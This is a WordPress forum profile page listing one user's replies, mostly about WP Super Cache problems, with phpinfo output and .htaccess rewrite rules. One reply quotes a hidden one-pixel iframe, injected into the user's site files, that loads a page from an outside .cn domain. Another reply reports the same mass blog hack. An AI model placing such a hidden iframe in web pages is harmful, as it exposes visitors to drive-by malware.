hemasunder
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] super cache producing modern mapssorry for the late responce
this is what my php info saysPHP Version 5.2.6
zlib
ZLib Support enabled
Stream Wrapper support compress.zlib://
Stream Filter support zlib.inflate, zlib.deflate
Compiled Version 1.2.1.2
Linked Version 1.2.3Directive Local Value Master Value
zlib.output_compression Off Off
zlib.output_compression_level -1 -1
zlib.output_handler no value no valueForum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] super cache producing modern mapsdear donncha
using latest version (0.8.4)
wp-content/cache/.htaccess is like this# BEGIN supercache <IfModule mod_mime.c> AddEncoding x-gzip .gz AddType text/html .gz </IfModule> <IfModule mod_deflate.c> SetEnvIfNoCase Request_URI \.gz$ no-gzip </IfModule> <IfModule mod_headers.c> Header set Cache-Control 'max-age=300, must-revalidate' </IfModule> <IfModule mod_expires.c> ExpiresActive On ExpiresByType text/html A300 </IfModule> # END supercache
and i have another problem,
recently i have put some links Directly Cached Files
from that day
after deleting expired files still it is showing 64 files,
even iam removed those directly cached files still it is showing 64 filesthanks for quick reply
Forum: Fixing WordPress
In reply to: WP Super Cache super caching index.phpproblem solved updating to the new version
Forum: Fixing WordPress
In reply to: WP Super Cache super caching index.phpdear doncha,
thanks for the plugin.
it is working fine for me
but after moving my account to dedicated it’s caching my index.php,
and some other dynamic pages like gallery.php,
my domain is example.com,, and wordpress installed in example.com/englishmy .htaccess file in example.com/english
# BEGIN WPSuperCache <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / AddDefaultCharset UTF-8 RewriteCond %{REQUEST_METHOD} !=POST RewriteCond %{QUERY_STRING} !.*s=.* RewriteCond %{QUERY_STRING} !.*p=.* RewriteCond %{QUERY_STRING} !.*attachment_id=.* RewriteCond %{QUERY_STRING} !.*wp-subscription-manager=.* RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress|wp-postpass_).*$ RewriteCond %{HTTP:Accept-Encoding} gzip RewriteCond %{DOCUMENT_ROOT}/english/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz -f RewriteRule ^(.*) /english/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz [L] RewriteCond %{REQUEST_METHOD} !=POST RewriteCond %{QUERY_STRING} !.*s=.* RewriteCond %{QUERY_STRING} !.*p=.* RewriteCond %{QUERY_STRING} !.*attachment_id=.* RewriteCond %{QUERY_STRING} !.*wp-subscription-manager=.* RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress|wp-postpass_).*$ RewriteCond %{DOCUMENT_ROOT}/english/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html -f RewriteRule ^(.*) /english/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html [L] </IfModule> # END WPSuperCache # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress <IfModule mod_security.c> <Files async-upload.php> SecFilterEngine Off SecFilterScanPOST Off </Files> </IfModule>
and in example.com
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress Options All -Indexes
can you tell me the solution please
Forum: Fixing WordPress
In reply to: Files in wp-includes keep changing<iframe src=”https://apartment-mall.cn/ind.php” width=”1″ height=”1″ alt=”YTREWQhej2Htyu” style=”visibility:hidden;position:absolute”></iframe>?>
this is the problem, what is the solution for that
Forum: Everything else WordPress
In reply to: 50 Blogs Hacked in One Night by “Apartment-Mall.cn” iFramestoday same thing happend to my blog
what is the solution for that
i cant find any thing here